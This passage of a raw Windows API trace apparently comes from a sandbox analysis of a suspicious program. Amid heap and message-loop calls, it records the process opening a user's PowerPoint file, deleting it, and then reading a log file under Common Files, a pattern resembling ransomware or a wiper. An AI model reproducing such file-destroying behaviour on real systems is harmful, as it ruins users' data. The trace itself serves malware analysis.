lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.928] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.928] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.928] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.928] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\azdr3iffhu3nwrtgjj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0032.928] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.929] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.929] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.929] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.929] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.930] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.930] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.931] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.931] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", lpFilePart=0x0) returned 0x3f [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.931] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\azdr3iffhu3nwrtgjj.pptx")) returned 0x20 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.932] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x13833540, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 0x7c2240 [0032.932] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\azdr3iffhu3nwrtgjj.pptx")) returned 1 [0032.934] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x13833540, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 0 [0032.934] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.934] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4f8 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.935] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.935] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.935] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.935] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.935] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.935] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.936] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xe0f, lpOverlapped=0x0) returned 1 [0032.936] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xe0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, 